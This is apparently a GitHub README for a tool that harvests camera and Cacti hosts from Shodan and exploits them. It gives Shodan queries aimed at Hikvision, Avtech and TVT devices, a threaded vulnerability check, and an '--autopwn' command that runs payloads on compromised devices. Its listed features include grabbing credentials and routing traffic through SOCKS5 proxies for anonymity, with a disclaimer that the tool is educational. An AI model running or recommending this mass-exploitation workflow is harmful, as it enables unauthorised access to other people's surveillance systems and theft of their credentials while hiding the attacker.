This is a tool meant to assist Cyber Security
researchers on Discovering outdated and Vulnerable camera systems on the internet by utilizing shodan.io. I was able to discover thousands of vulnerable cameras using it. It could be for Cammera Attacks research, CCTV's Attacks research, etc.
- [+] Hikvision
- [+] Nikon
- [+] Avtech
- [+] GoPro
- [+] TVT
- [+] Cacti
Coming Soon . . .
- Fetching of hosts from shodan.io
- Check for vulnerable cameras
- Automatically run commands on exploited Devices
- Automatically grab camera credentials
- Multi-threading for faster scanning
- Usage of Socks5 proxies for anonymity
- Storing results in Sqlite3 database
- Logging all actions in log files
To use this tool you need to have the following:
- Shodan API Key
- Socks5 authenticated proxies
git clone https://github.com/byt3n33dl3/CamHoundAD
pip install -r requirements.txt
python3 scanner.py --help
# Collect Hikvision hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Hikvision IP Camera"' --pages 1
# Collect Avtech hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'linux upnp avtech' --pages 1
# Collect TVT hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Cross Web Server"' --pages 1
# Collect Cacti hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'Login to Cacti' --pages 1
python3 scanner.py --check --proxy-file proxies.txt --threads 20
python3 scanner.py --autopwn --proxy-file proxies.txt --payload "id"
This tool is purely educational and is inteded to make the internet more secure. I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only. Any PR's or suggestions on improving this project are welcome